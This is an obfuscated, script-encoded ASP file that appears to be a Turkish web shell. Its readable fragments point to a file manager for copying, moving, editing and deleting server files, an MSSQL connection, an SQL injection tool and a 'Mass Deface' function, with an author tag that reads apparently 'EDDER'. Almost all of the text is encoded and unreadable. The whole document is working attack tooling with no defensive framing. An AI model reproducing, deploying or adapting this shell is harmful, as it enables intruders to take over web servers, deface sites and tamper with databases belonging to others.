4D0*i.+O;Mx~0ms/iEE@*@!4@*~h+.:bdbWU,K/YD,@!z(@*@!zm@*~k,@!l,4D0'EE'sbVnCY4'rghW9n'yc'VKxEhxr[VW	;s[ELKb:+{JLOks+'JEPGU1Vk1V'rJ3^CdWM`Dtr/ 4M+W#p.+DE.U,0lsdiEJ@*@!(@*F^lk�DP��^+ss+Mk@!z(@*@!&m@*P-~@!mPtMnW'EJLsrVnKmY4[r_:KNnxy%[VG	Eh'r'0WU!:LJ[:ksn'r[Oks+'EEPW	^Vbm3{EEmsNvY4kd 4Dn0*IDY;.	P0Csk+IJr@*@!4@*,ZtfP@!z(@*@!Jl@*P-P@!C,tDW'EJ[wrs+hlDt'J_hKNn'2*[0WU;s'J'VKx;:LELKrs+{J[Dksn[rB~@*@!4@*~tXOtj{UpS,@!&4@*@!Jl@*Pk~@!l~tMn0{BE'wkVnKmY4[r_sW['W*[0W	;:{J'3Kx;hLJ[:r:'JLOr:[rB~WU^^k^3{EJ1:[cDtkd 4Dn0*IM+O!D	P0mVknirJ@*@!(@*~]o29rY,@!z(@*@!zm@*,u~@!C~4Dn0{vJLsrsnlO4LJ_:K['1O[0Wx!:{E[0WUEs[E':k:xJLYksn'JEPKx^Vr^0'EJ(ryvY4rkRt.n6#IDO!DU,0mV/irE@*@!4@*PCAr",|ksryC"P@!&8@*@!zm@*'x8dai'x(dwp[U8kwi@!&DN@*@!JOM@*@!JYm4V@*@!8D@*J@#@&M+d2Kx/ hMkY~E@!Dl(VnP^n^V2l9[k	oxEr!JE~1+sVk2mmr	o{JJZJr~tkLtD'EEy*Jr@*@!DD@*@!O[P1Vm/d'EE04.YsEJ@*[U8kwi'U(/2iLU(/2p@!mPtM+6xBr[ok^+KCDt[r_:KN+{fT[0W	Eh'E'0WUEs'JLKrh'J'Ob:n[rv,WU1Vbm3{Jr^:9`Otb/ 4M+0*IDYEMU~0mVk+IJE@*@!4@*PhrxTPjC^N�D�d�~@!z8@*@!&m@*~-P@!lP4DW'EJ'sbVnKmYtLEgsWNxf&L3Kx;:xEL3Gx!h[r[Prs+'E'Dkh+LEEPG	m^km0'rE3^ldWM3G2Hl`D4kkRtMnW#pDY;DU~6ls/IJr@*@!8@*PHCr^P$Ws8mD[�sl	�P@!J4@*@!zm@*~u,@!C~4D+6xBr[sbsnnmY4[EghG9+x&8'3Kx;h{J[VG	Eh[r':kh'r[Yb:'JEPGx1Vr^0'JrVVm/WMVGwHlvY4kd 4Dn0*IDY;.	P0Csk+IJr@*@!4@*,Im:PLP;2E,?CV9�D�d�~@!z4@*@!zm@*P-~@!l,tM+W'vELsrVKlDt'EQ:W[n{&+[0G	Eh{JL3W	Es'JLKr:'E'Dk:'JEPW	^sk13{JE/Gh!DcY4r/ct.n6#i.nDE.x,WmVdirJ@*@!4@*~|mXUl0Pj�h�M�m�P@!&4@*@!zm@*~u,@!mP4DnW{BE[wrVnCO4[J_hKNn'21L3G	Es'JL3KUEs[E[:khn{J[Dr:[JE~Gx1VbmV'EE0VC/K.`DtrdctDnW*i.+D;Mx~6l^/+pJr@*@!(@*~HG*'jD\ iP@!z4@*@!&l@*P-P@!l~4M+W'EE[wksnhlY4'rghW9n{c+L3KxEs'r'3Kx;:LJ'Pb:+{E[Dk:'EB,W	msk^V{JE:md/vY4rkRt.n6#IDO!DU,0mV/irE@*@!4@*Pt?	/:WW^dP@!z4@*@!&l@*P-P@!l~4M+W'EE[wksnhlY4'rghW9n{c*L3KxEs'r'3Kx;:LJ'Pb:+{E[Dk:'EB,W	msk^V{JE:md/vY4rkRt.n6#IDO!DU,0mV/irE@*@!4@*PoHJu:Kn,@!z(@*@!JC@*[	4kwI[U8kwI[	8/ai@!&DN@*@!&DD@*@!JOm4s@*@!4D@*J@#@&D/2W	/n SDkDnPr@!zD[@*@!JYM@*@!Y[@*@!Y.@*@!WWM:~C1YkGU,'~Jr~r[obVnlDtLEgsW[+{ f'0Wx!h'r[3KU;:LJLKr:nxr[Oksn[rPEE,:+O4KNxJr2K/OrJ@*@!Ym4^nP1+sVal[[bxo{EJZJJ,^nV^/al^kUL{JE!rE@*@!Y.@*@!YN~dDXs+{Er4C13TDW!x9RmKVGD=F+qyF rEP1VlkdxJr3(DO:EE@*[U4k2iLx8dai[U8kwI@!(@*zDCsl=P[	4k2iLx8/ai'U(/wp@!z(@*@!JO[@*@!Y9@*@!kU2!Y~xmh+{JE4mm3n[rJ~\ms!+xrJsN4rJ,OXa+xJrYnaDJJ,dYHV+{EEhbNDtl TTa6IJr@*@!JY[@*@!YN@*@!bx2ED~DX2'rJ?!4srYrJ~\mV;n{JJLU4kwiLU8/aizDCP'.m;;Wp'x(/2ILx4d2pJEPkOHVn{Jrhk9Y4lGZi~0KxORS+kT4Y=4W^[IJr@*@!zON@*@!JY.@*@!&Ym4sn@*@!zO[@*@!&0K.s@*@!JYM@*@!DN@*@!YM@*E@#@&DndaWxknRSDkDn~J@!0KDhPC^DkGx,xPrJ~ELsksnhlOtLEQ:G9+{F[:ksn'r[Oks+'E,JJ,h+DtW9xEJaWkYEJ@*E@#@&.+k2W	/n SDkOn,J@!Ym8^+~1+^VwmN9rxT'EJZJE~1+V^dwmmk	LxJr!rJ@*@!O.@*@!ON,dYHVnxrJ4C^0o.W!U9O^KVKD)8 8+FyJEP1VCdk'JrV4MY:rE@*[	4kwI[U8kwI[	8/ai@!8@*|WU;sPlPLU(/2p[	4/aiLU4kwI@!J4@*@!JYN@*@!Y9@*@!bU2EDP	lh+xErDn:KO+rJ~-mVEnxEJ'3KU!:'rB,YXa+{EJD+aYrJ~dDXVxJrhk9O4)2*ZwaiEE@*@!&Y9@*@!DN@*@!bxw;O,YzwxrJj!4skYrJ,-l^En'rJ!rDP[MC;!WirE~/DX^+xJEAbNOt=X!pPWG	YOAnbo4Y=8KV[pJr@*@!JY9@*@!JY.@*@!zOC(V+@*E@#@&D+k2Gxk+ch.kOn,JE@#@&.+kwGUk+RA.bYnPr@!JY[@*@!J0WM:@*@!zDD@*J@#@&.nkwW	d+chDbOnPr@!JYC4sn@*@!&mUYD@*E@#@&@#@&vI+O3b~alUVbP4HPABfAI@#@&M+d2Kx/ hMkY~E@!Dl(VnPAr9Y4'rEFZ!YEr@*J@#@&M+dwKUk+ SDbY+,J@!OD,\CVboUxrJYK2Jr@*@!D[~mKVkwCxxEr EJ,CVboUxrJmnUD+.Jr@*r@#@&M+kwW	/ hMkO+,J@!Om4V~mVVaC[NbxT'EJTErP^+^s/al^r	o'EEZJE@*r@#@&DnkwKx/RS.kD+~J@!Y.@*@!YN,dYHV+{EE4mm0o.W;U9O^W^GD=F+qyF EE,mslkd{JE04MY:rJ@*'x(/2iLx8dai[	8/ai@!(@*e+D3bPl@!&8@*[U4k2iLx8dai[U8kwI@!JO9@*E@#@&1lV^PHnY0k@#@&M+d2Kx/ hMkY~E@!JYM@*@!zOC(Vn@*r@#@&M+d2Kx/n SDrY~r@!8M@*@!zY9@*@!&YM@*@!zDl8s@*@!(.@*r@#@&U[Pb0@#@&@#@&@#@&@#@&j2d3Z:P/)U2PhG9+@#@&;)U2~yPEPfbybUP0W2XmVC~:b�q,8X,29G3]@#@&W	PnD.GMP.+k;:PUnXY@#@&./2W	dRAMkD+Pr@!DC4^+~hbNO4{JJ8T!uJJ@*E@#@&M+kwGxdnch.kDnPr@!O.,mVCdk'EJ08MYhrJ,\l^kTU'rJOWaJE@*@!YN,^W^/wmUxJr rJ~lsrTxxJr^+	Yn.rJ@*E@#@&Dn/aG	/nchMkYPr@!0KDhP	lhn{JJ9rybxmK2zwm/D+EJ~C1YrW	xBr[or^+nCO4[EB,OHwn{JrwWkYrE@*r@#@&D/2G	/+cADbY+,E@!Ym4^+~msCk/xJrV4MYhErPmns^wCN9r	oxrJ8JJ,msVkwCmbxLxrJFrEP(omKsGD{JraXNX[lNEJ,Ak9Y4xrJFTTuJE@*r@#@&YC(VK&!vJ,@!4@*frybx~FKwXmsl,zP:C��~HD0+"k@!&(@*E#@#@&Ym4sG2!`E'	4dwpE*@#@&M+kwW	/ hMkO+,J@!r	wED~YHw+{EEtbN9+UJE~7lsExJr&EE,xlhn{JE:K[JE@*@!bxw!Y,OXa+xJrtr[9+xrEP7lV!nxJL0bVn[E~	lh+{EJ6ksnyJJ@*@!bx2ED~DX2'rJtbN9nxrJ~\mV;n{J[wGV9+DhCOtLJ,xC:nxrJVW	;:rJ@*@!bxw;O,YzwxrJ4bN9+xrJ,-l^En'r[Ors+[r~xm:+{EEKb:JE@*~E,@#@&Ym8VKF+cr|W2 ,5nD,l,@!r	w!YPkYHs+{B^W^W.x[Zvw/AABP,dry'rJ!EE,YzwxJrYnaDJJ~Um:n'rEwWs9+MnlDtyEJ,\CV!+xELsW^[+MnlD4'J@*J*@#@&YC8^Wq vE@!bx2;DPYz2'.l9rKPUm:'Bb/^n:EP-l^EnxE3Wazl^lB,^4+13N@*|G2Hlsl,~@!bx2;DPYz2'.l9rKPUm:'Bb/^n:EP-l^EnxEYlkrB@*Klkr~J*@#@&YC4sG8 cJ@!8D@*@!rUaEY~-mV;+{ErP!�	NDPrJ,OXa+xJr?;8skYrE@*r#@#@&.n/aW	/nRA.bYnPr@!z6W.h@*@!zOC(Vn@*@!&DN@*@!zDD@*@!zDC4^+@*@!(D@*E@#@&ZmsV,ClDC@#@&@#@&;bj2~f,B~Nb"k	PVGaPYC��hm:~o.�3s�kHWD,P(zPA992"@#@&G	P+M.WMPDd;:P	+aY@#@&b0~kks+s'EVKwXCsmJ~Y4n	@#@&,P,PsUrc/WaXoW^Nn.,3W	;:BsW^[nDhlDt+@#@&~,P~kks'r3G2HlVCU9�R J@#@&Vdk6PkkVh'rYC/bJ~O4+x@#@&P,PPwj6RtW7+oWs[D~3KUEs~oG^N+.KmY4 @#@&,P~,kkV'rYm��UN�cRE@#@&+U[,k0@#@&D/wKUd+cMkO+~E@!4.@*@!8D@*@!^n	Y+.@*nVC/K.,J'b/^[J,@!(.@*r@#@&D/2G	/+c	DbY+,E@!4M@*@!0GxO~1WsWMxXVsGS@*|Cz	lVP=~@!zWKxD@*JLsKsNDKlDt'E@!4D@*@!0KxY,^GVKD{XnVsGS@*u+9n0,)~@!J0WUO@*J'sKs9+.hlDt @#@&Mn/aWU/R	.bY+,E@!(D@*@!8.@*(X,2%Nn.@!z^+	O+M@*E@#@&Zlss,CCYm@#@&@#@&;bU2PWPE~fbyrx,?�sh+P(zPA9fA]@#@&Kx,+.DG.,Dn/!h+,xnaD@#@&oj}R9+^nD+oKV9+D,Ns@#@&kWPD.@!@*!PD4+	@#@&;CsV,W^:CNrcrfrybUPUksn	+:[rr#@#@&sk+@#@&ZmVV,W^[EvJ9k.kU~UkVbUNbJ#@#@&nx9Pb0@#@&@#@&;bj2,XPEP9GkXl~dbVh+,G^lz�,oD�+0Vb�rXaW.P,4z~A9fA]@#@&Wx,n.DKD,Dn/;hPU+XO@#@&sj6cf+snD+ok^n,Nn^@#@&k0,+M.@!@*!~Y4+U@#@&Zl^sPKV:m[r`rfK/zl~jbVrxh+9kEb@#@&+sd@#@&Zms^PG^N!`JGWkzl,?rVbx[rr#@#@&nx9Pk6@#@&@#@&B;bj2~,B~fKdXmP9GSVlG[,+O:~(X~A9G2I@#@&E~fKhUVKl[~4lYms�PKVN!�;~k�bxBP�jKP3,YC��N�sh@#@&@#@&/z?2~{,B~fKdHl~nWalX^l,Pl��sl~n}?P~0�/:�,8X,29G3]@#@&W	PnD.GMP.+k;:PUnXY@#@&./2W	dRAMkD+Pr@!DC4^+~hbNO4{JJ8T!uJJ@*E@#@&M+kwGxdnch.kDnPr@!O.,mVCdk'EJ08MYhrJ,\l^kTU'rJOWaJE@*@!YN,^W^/wmUxJr rJ~lsrTxxJr^+	Yn.rJ@*E@#@&Dn/aG	/nchMkYPr@!0KDhP	lhn{JJ9G/HlmK2zwm/D+EJ~C1YrW	xBr[or^+nCO4[EB,OHwn{JrwWkYrE@*r@#@&D/2G	/+cADbY+,E@!Ym4^+~msCk/xJrV4MYhErPmns^wCN9r	oxrJ8JJ,msVkwCmbxLxrJFrEP(omKsGD{JraXNX[lNEJ,Ak9Y4xrJFTTuJE@*r@#@&YC(VK&!vJ,@!4@*fG/Hl~FKwXmsl,zP:C��~HD0+"k@!&(@*E#@#@&Ym4sG2!`E'	4dwpE*@#@&M+kwW	/ hMkO+,J@!r	wED~YHw+{EEtbN9+UJE~7lsExJr%EE,xlhn{JE:K[JE@*@!bxw!Y,OXa+xJrtr[9+xrEP7lV!nxJLYb:n[E~	lh+{EJ:khnrJ@*@!r	w;Y,OHwn{Jrtk9NUJrP-l^Enxr[0bs+LJP	Ch+{Jr0rVnEr@*~J,@#@&Dl8sKF cEnW2R,eD~=P@!kxaED~Pkk"+{JEZJJ,OXa+'rEO+XYrJ~xCh'EJ6GV9+.ErP\Cs!+xJLWbVnLJ@*J#@#@&DC4^Wq vJ@!r	wED~YHw+{.CNbW,xC:nxEkdVhB,\Cs!+'vVKwzl^CEP^4+13+9@*nGwHlsl,P@!r	wED~YHw+{.CNbW,xC:nxEkdVhB,\Cs!+'vOm/rB@*Pm/r,J*@#@&Dl(sW8 cJ@!4.@*@!kxa;Y,\l^;n'rJ,M�UNn.,JEPDzw'EEUE4hrDJE@*rb@#@&./aWxk+cADbYnPr@!&WKD:@*@!zDl4^n@*@!JY9@*@!zO.@*@!&Ym8V@*@!8M@*J@#@&;lsV,umYC@#@&@#@&Zz?A~%,B~fK/zC,3Wazl^l~,OC��:ml,Wslz�~(X~2x92"@#@&G	P+..KD~Dd!:n,x6Y@#@&bWPb/s+s'EVKwXmslrPY4nU@#@&P,P~sj6cZGwHok^+~WbV+SWKV[+M'rJ@#@&P,PPb/^xJ0W2XmVCU9�RRr@#@&V/rWPb/^+h'EOm/rJ,Otx@#@&,PP~oUr HK-sr^+,0k^+BWW^NnDLJE@#@&PP,~kkV'rOC��x9�RcJ@#@&nU9Pr0@#@&k6Pn.MP@!@*~ZPOtU@#@&./aWxk+c	DbYnPr@!8.@*@!4M@*@!1+xDn.@*~l�mD�d�ys�V^l~/KUE�^lU[�,""Z~@!4.@*r@#@&+sk+@#@&D/aGxk+ MkOn,J@!(.@*@!4D@*@!^+	YD@*|sCkW.Pr'kkV'E,@!4.@*r@#@&+	[,kW@#@&M+/aW	d+c.kD+~E@!4D@*@!0KxY,^GVKD{XnVsGS@*FlHUl0Pl~@!z0GUD@*E[6r^+'r@!(D@*@!0KUY,mGVKDxzVVKA@*_+NW~),@!J0GxO@*r[WW^[+M[Ewr@#@&.nkwGxknc.bYPJ@!4M@*@!(D@*4HP3%9+D@!&mxY.@*J@#@&;lsV~umYC@#@&@#@&;bj3,,Pv~GWdXm~��bxr,o�M�xY�^+,8X,2BfAI@#@&KxP.DKDPMndEs+,xn6O@#@&In/aGxk+ 	MkYn~r@!^+	OD@*@!4@*@!0KxD~mKVGD{W.C	o+@*E[alY4'E@!J0KxO@*@!&(@*@!z1nxD+.@*@!4D@*E@#@&]+k2KxdRqDkD+,E@!Dl8VP^sm//{EJ04DDhEJ,hbNOtxqZ!YP@*@!YM@*@!O9@*J@#@&k+OP6~{PoUrcrwx:n6DsrV`Wr^+~8b@#@&I+k2Gxk+c.kOn,J@!0KUY,/r"'&@*@!aDn@*r'U+.7+MRC:Hd3x1W[+v0 .lNzsV*[J@!&2D@*@!zWWUO@*J@#@&"n/aWUdR.rD+~J@!&DN@*@!zDD@*@!zDC4^+@*J@#@&UG^k/D~',KD!n@#@&b0,+.D@!@*+ ~Y4nx,CCOm@#@&rW,+.DcU!:8D{v ,Y4nx,@#@&I/2G	/+c	DbY+,E@!/1DbwOPsC	o;lTn'Nl-CkmDr2D@*CV.D`v~E,fWkXm~r0EUls�XG.'x?bdY:P9GdXm/�,Wsl8r^k.B*@!zkm.raY@*E@#@&xGVbdDPx,smV/@#@&nx9Pr0@#@&@#@&;b?A~FZPB,)jn,YXY~w42,R PTr4bP[GkXlsCM�P3NbO^+h3,k�k	Ph6?DPV�/s�P8z,29G3I,@#@&KU~+MDKD~Dnd!:nP	n6D@#@&dYPW~{Po?} }wn	K6Ywk^n`6ks+BFb@#@&D+k2W	/+c	.kD+,J@!mnUD+.@*@!WWM:~C1YkGU{BE[wr^+KmY4[JQKbh+{J'Yb:n'r[3KUEs'JLoGV9+MnCY4'rB~:OtKNxErwWdOrJ@*@!DC(Vn,m^l/k'rE3(DO:rJ@*@!DD@*@!ON,lVbLU'rJ1+UYn.rJ@*J@#@&I/2G	/+ 	MkO+,E@!kUaEDPYHwxtbN[+	PUCs+'rE:KN+rE~\mV!+xBqqE@*E@#@&]+kwGUk+R	.bYnPr@!bx2!Y,YXa+{4k9Nnx,xCh'0bs+,\l^;n'r[6ks+'E@*J@#@&"n/aWUdR.rD+~J@!8M@*@!(D@*@!k	w!OPDX2+{/;8skY,-l^E+{EEPcR,)lP~~nlzNOP,)l~cRP~Er@*@!4M@*@!4.@*@!JYN@*@!JOD@*@!OD@*@!O[,lVbLx{JJ1nUYDrJ@*J@#@&"+dwKU/R	.bY+~E@!Yn6DCM+C,xm:+{Jrr/^+hJrPdOHV+{vhbNY4l1!ui4+ro4O=&X!pv@*r@#@&]/wGUk+ MrD+~k+M\+MR_PHd2UmKNnc6RDCNzVV*@#@&I/aWU/n qDrY~J@!zOnXYl.nm@*@!zD[@*@!&DD@*@!zDl(s+@*@!&0KDh@*@!zmUYD@*r@#@&ZmV^PulOC@#@&UW^r/DPx~:DEn@#@&@#@&ZzjAPq8PEP29kDs+s+~W^lz��~T+D�VV�kXK..P(X,2Bf3]@#@&Gx,nDMW.~M+/;hPU+XO@#@&dY,/l7+:n6DsrVPx~w?rc6wxKaOsbV`WksnB SYM;+B0Csk+#@#@&;lsV,umYC@#@&kl\KaYwks+c.rD+`bdV:#@#@&dl7+:+aYor^+ m^G/@#@&r6P+..@!@*TPD4x@#@&W^:l9kvE29kOVxnhNkbE#@#@&+^dn@#@&W^N;`E39kOVUNbJb@#@&+x[~b0@#@&@#@&;bjAP8 PEP"n/b:~fK/zCk�x�PV�.�xD�V+~~4HPA992]@#@&WUP.DKD~./Ehn,xn6D@#@&InkwKx/Rq.kD+~J@!4.@*@!m+	O+M@*@!bhLPzS:'EJjCj?C|c/WtP8z,2993"Px#,ErPdMm{BJL0bs+LJv@*@!z^n	Y+M@*@!(D@*@!8.@*r@#@&ZCVs~_lOl@#@&xKVrdDP'~PMEn@#@&@#@&Z)U2,F&,B,jpdPr�k	PP)(VW^CD�,SkkOnV:P8X~3xf3I@#@&I/2G	/+ 	MkO+,E@!mn	YD@*@!4@*@!0KxOPkk"n{&@*:C4^WVm.@!z6W	Y@*@!&8M@*@!4M@*J@#@&jnDPW8%;WUx,x,?nM\DR;DCYr8LmOcrbf}9AcZW	UnmDkKxE#@#@&U+OPK8Lzf6p,'PjnM\nDc/M+CD+}4LmDcJzf6(cZCOmVWTE#@#@&W(%/W	xcn.W-r9+.P{~Jtk^.K/WWOc9nYc6^+[(RWR!r@#@&G4NZGx	R/G	x+1OkKx?D.rxTP{PWksn@#@&G4N/W	x 6a+x@#@&K4%bG6oR)1Yb\+;W	U+1YrW	Px~K4L;Gx	@#@&@#@&.+kwKxd+ AMkO+,E@!Dl8sPmsCk/xJrV(DOsJr@*J@#@&wGD,2Cm4POC(V+,rx,W4N)9roR:l8Vnd@#@&~P,~q6POC(V+ PHwnP{~rK)~SAJP:tU@#@&P~P,P~~,I+k2W	/+c	.kD+,J@!Y.@*@!Y[@*@!WW	Y~Wmm+xAbxLNbUT/~kk.+'l@*W@!z6WUY@*P@!C,tDW'EJ[wrs+hlDt'J_hKNn'8*[6ksn{J[Wr^+'JLOm4s'r[Ym4^nRglh+LJ'VKxEsxJLsW^[nDhlDt'J'Ob:n'r'Yb:n'rB@*E'Dl8V glh[r@!zm@*@!&Y9@*@!zDD@*E@#@&P,~PAxN,(W@#@&16O@#@&./2W	d+ch.rD+PE@!JYC4^n@*J@#@&D/wKxknRSDrYPE@!Jm+	O+M@*J@#@&/l^V,CCYC@#@&xGVbdY,'~PME+@#@&@#@&/bU3,F*,B,Kb(VK~k�Dr�k,o�.�UD�V+snP(XPAB92"@#@&ZCVs~UpJ{snx!{8z|2L[nM@#@&Zms^Pj5S|4X|2x92"`Wk^+SOm4Vb@#@&xW^rdY,',K.En@#@&@#@&Zzj2,FX~EP?}J,3GN,zDs�YbD:PKslH�P8X,2B9AI@#@&r0,k/^nhP{Pr/nVn^DJ~Y4nx,kU%mY~x,kUL^DF@#@&k6PkkVhP{PENVnOJPD4+	Pk	%nmDP{Prx%n1Y+@#@&r0,kds:Px~rkU/.DJ~DtxPbxNnmDPxPbx%n1Y&@#@&k6Pkksn:,',J;w[CD+EPD4+	PrUN+mO~{PrxNn1Y*@#@&b0Pb/^n:,'~J9kLnMJPD4+	Pk	%nmDP{Prx%n1YX@#@&jpd{hn	E{8z|2%N.@#@&./aWxk+cADbYnPr@!8.@*@!mUYD@*G8~5DbPlP@!WKxOP1GVKDx:;vs/$A@*E[6r^+'r@!J0W	Y@*@!z1+UYD@*E@#@&DdwKx/ ADbYPE@!8.@*@!^+	O+M@*j5^P3Gh!Y~),@!6WUDP1WVKD{:Z+s/AA@*E'bxL^YLJ@!JWGxD@*@!z^+UOD@*@!(.@*r@#@&r6Pkds:~',Ek+smDJPDtU@#@&dr0,xGO,+L9nDk;V,x~JrPDtnx@#@&id/l^sPt?j}d{4zmA992"cL[Dk;VBk	%+1Yb@#@&dnsk+@#@&7d;lV^~jpd{(Xm2B9AIc0bs+BkU%mYb@#@&dnx9~b0@#@&+^/+@#@&KUPD.WMP.nkE:~x6Y@#@&r0,+NNnDd5^PxPrEPDtnU@#@&djnDPG4N/KxU,',?+M\.R;DnlD+68N+mDcJzfrG$ ZKx	+^YrG	Jb@#@&7?Y~G(LI^d,'~?.7+.cZM+lD+}8LmO`rb96GAR"nmKDNUnOJ*@#@&dG4%/KxURh.W7k[nMP'~Etk^DKdK0Oc9YR}V[4cc !r@#@&7K4L;Gx	RZKUU+1YbWU?O.bxLP{~0bVn@#@&dW8%;WUxc6a+U@#@&V/@#@&7?Y~W(L/G	xP{~?D\. ZM+mYnr8%mO`r)f}f$ ;WxUn1YrW	E*@#@&i?YPK4N]mkPxPU+.-DR;.+mY+}8%+1YvJ)f69~R]+1GD9?nOr#@#@&7K4%ZKU	R6a+	P+NN./$V@#@&x[~b0@#@&@#@&b0P..P@!@*,!~Y4n	@#@&dMn/aWUdRh.rD+~J@!8M@*@!(D@*@!mxDnD@*P@!0KxO~1WVK.'[s2F)0c@*P@!0GxO~6l^+{	k	o[r	o/~dbyn'l@*g@!&6W	Y@*,fmOl~ld+,ksn,Al�^CxD�x�y,jC�VmxmH)N��~Ze"~4H~2xf3],)`~@!6WUY,^KVGM'[s2FbR*@*,@!WW	Y~Wmm+{	k	oNbUL/,/byn'X@*g@!&0KUY@*P@!&6WxO@*,@!&mUD+.@*@!(D@*@!4M@*J@#@&nVk+@#@&iWx,nDMWD,.n/!:PU+aO@#@&7W(%I1/ 6a+x~r	LnmDSK4%;W	x~,l96wxF+H/nO,~PB~l9Z:9Pn6D@#@&dr0~nMD~@!@*~!,Y4n	@#@&77;lsV,G^:C9kvJ@!(D@*jpdP�ULmOrKxPnG:!YE	;"NmP_bPb~-mD P~rVskzGM/lU~nEsVmUsl@!(D@*@!4M@*rb@#@&dnVk+@#@&idZmsV,WV9;cJ@!4M@*~?}J,�x%+1OkKx~$m�lD�zsmP!2M�n0Vn�DkbR@!(D@*@!4M@*E#@#@&7n	NPbW@#@&+x9~r0@#@&K4%I^dcmsWkn@#@&W8%;WxU 1VG/@#@&+U9Pb0@#@&xKskkY~',K.;@#@&@#@&Zz?2,qPEPGWdXC~zf(P9n�k�Dk.hPsG.sE~4H~A99AI@#@&W	P.DKD~D/;hPxaY@#@&Dd2W	/RADrOPE@!DC4^+~AbNY4xrJq!ZYrJ@*r@#@&D+kwKU/RADbYn~r@!YM~\mVkTUxJrYKwEJ@*@!DN~mKs/alUxrJ EE,lskTU{JE1+	Y+MJr@*J@#@&.+kwGUk+RS.kD+Pr@!WWM:,xC:nxrJ[Wkzl	lhnNkOErPCmDrKxxEJLsk^+hCY4[EB,Yz2'Jr2WkYJr@*E@#@&D/2WUdRADbO+,J@!Om4Vn~1+sVaC9Nr	o{JJ8Jr~mVs/al^r	o'rEFrJP(L^W^WM'EJ:X9*[*9EJ,hr[Dt'EE8!T]rE,msm/k'Jr3(.YsJEP@*J@#@&Dl4^G&Z`J,@!8@*GWkXCP)9�,Nn�k�DrDs+~\AD3n"b@!&4@*E*@#@&Dl(VW2!vEb9�PlP,@!WG	YP1GVKD'[/s;AA@*E[rd^+h[r@!z6WUO@*P@!8.@*Pe+Mr,)~,@!6WxDP1GVKDxa;vo/~2@*r'0bV+LE@!z6W	Y@*Jb@#@&Dn/aGxk+ AMkYn~r@!rxa;DPOHw'Jrtb[NxEJ,\Cs!+'rEFFJJ,UC:'rJhW[nrJ@*@!bUw!Y~OHw+xErtrN9n	JE,\mVE'r'0bVn[rPUCs+'rE0bV+rE@*@!bxaEOPOza+xJr4k9NnUrJP-C^En'r'wWs9+MnlDtLEP	lh+{JEVKxEsEJ@*@!k	2;Y,YHwn'EE4k[NUJrP-C^E+xELYr:'rPUm:'JrKbh+rJ@*PrP@#@&Dl4^GFy`J@!8@*fK/HlU�x~exrPz[�),P@!&(@*P'U(/2i@!r	w;DP,/k.+{EJ2!EJ,Yz2'JrO+XYJr~Uls+{JEkds:EJ,-l^Enxr[kds:'J@*E*@#@&Dl(VW8 vE@!(D@*@!bx2;DP\msE'Jr~!�x9+MPEJ~OHwn'rE?!4hrDJJ@*E*@#@&DdaWUk+chDbY~J@!zWWM:@*@!JYl(s+@*@!zD[@*@!JYM@*@!zOC(Vn@*@!8D@*J@#@&;lVs~_lOl@#@&@#@&/z?APFFPE~fK/zl,b[�~9+�k�DrDs+P}sCX�,oD�n3sn�bXGD,8X,2mBG2I@#@&Kx~+M.KD~M+kE:P	n6D@#@&?Y~WbV+}8LmY,x~0kWcMnYor^+c0bs+*P@#@&6kVn6(LnmD glhP{PkkVhP@#@&r0,+..,@!@*,TPDt+	@#@&d;l^V~WshmNr`r@!4M@*96kXl~)9�P[+�b�nt2[bk@!4D@*@!(.@*r#@#@&Vdn@#@&d;CV^PW^[;`r@!(D@*fGdHl~b9�~N�k�Or@!4D@*@!(D@*J*@#@&+U9Pb0@#@&?OP6ks+}4%n1YP{~1KYtbULP@#@&;lsV~umYC@#@&@#@&;bj3,F%~v,H)/k~G+WmNPt+MV+.k~4HP3BG2I@#@&W	P+M.GD,D/;:n~	+aY@#@&D/2G	/+ AMkO+,E@!YC(VPhbND4'rJq!Z]EE,mVmd/{JJ08.YsJr@*@!Y.~7lskTU'rJOGaJJ@*@!DN~mKskwC	'rJ rJ,CVboU'rJ^n	Y+MEJ@*J@#@&.n/aW	/nRA.bYnPr@!0KDh~	l:nxrJhlkdmYOmm0JJ,l1OkKxxBr[or^+nmOtLJgsG[+{FOB~:nO4W['E2WkYv@*r@#@&.nkwGxknch.bYPJ@!Ym8VP^+^V2C9Nk	L'rJFrE~mV^/2l^r	oxJrqJrP8L1WVG.{JEal[lNX9JrPhbND4'rJq!Z]EE,mVmd/{JJ08.YsJr@*E@#@&Om4sW2T`rP@!8@*Hbjj,fn0m^N~t+M3+.k@!&4@*Jb@#@&YC8^W&ZcJcRRc  P=)=)lP~�U9+aPn6f,EU;,b�l��zC,5Cy,&,5Ca��Y�MPP,)=l)=P RcR  r#@#@&Ol(VW2TcJ@!4M@*@!4@*FKx;:,lP@!z8@*@!kx2;DPdYHs'ErmKVWM'[/vwZ$2rJ~dby+{EJ+!Jr~Uls+{JE:Cdk3Gx!hJrP-C^E+xvr[VW	;s[EEPDXw'rEY6OJr@*@!8M@*@!(.@*r#@#@&.n/aW	/nRA.bYnPr@!k	w;O,YX2n{JEtb[9+UrJ,\l^ExJrF1JrPUCs+'rE:m//sG[+rJ@*@!rx2;DPOXan'rJ4r9N+UErP-l^;'ELYb:+LJ,Uls+xJrKrhJJ@*~J,@#@&DC8VKFyrcJ@!O6OlMnl,PdOHV+xErhrND4=*TZwXiP4+bLtD)+*ZwaErPxmh+{JJsCd/6k^+EJ@*@!JYn6DCDl@*E*@#@&OC(VGFy6vJ~@!k	wEDPDzw'EJMl[rKJJ,-l^E+{EE4MED+EJ~Um:n'rE:m/drkV+hErP^t^0+[@*P~DED+,~O,P~@!bx2;DP\msE'JrdrxTVJEPOza+xJr.l9kGErPxCh'EJsCk/rkV:JrP@*~?bxLVP~~ PP,@!k	wED~-l^E'EJG"VEJ,OXa+xErDl[rKJEP	Cs+xrJsl/kkks+sJEP@*PK.b\lDnP@!kxa;OP	ls+xJEhm/dk	%+1YqErP\Cs!+xJr"ctOsVrJPDXan'rJO+XYEE,/k.n'8*@*,~'x(/ai'x8dai~@!bUw!Y~-mVEnxrJG3rE,Yza+{mtm08WXPUls+xEr:lkdtm/t2EEP@*20VnxOr,@!rxa;Y,/r"'FX~	lh+{Er:Ck/4l/4 rEP7lsE'EE4YYa[W1/-rE~YHw'EJOnXYEJ@*E#@#@&OC(VWq+}`E@!bUaEO,xm:+{Jrhlk/4lkt1ErP\msE'Jr^GwHJrPOX2n{DCNbGP1tn^0+N@*~nW2XmsmXCMl0PP P,@!k	w;Y,xCh'Jrhlk/tmd4,rJ,\CV;n{JEXm.lDJE~DXwnxMl[kK@*,rs!�Y!DlMl0E#@#@&Ol(VGqyr`r@!k	wED~-l^E'EJ~um\CXmCP`�E..,JJ~OHwn'rEUE8skDJJ@*J*@#@&Hl"/KVcE@!0W	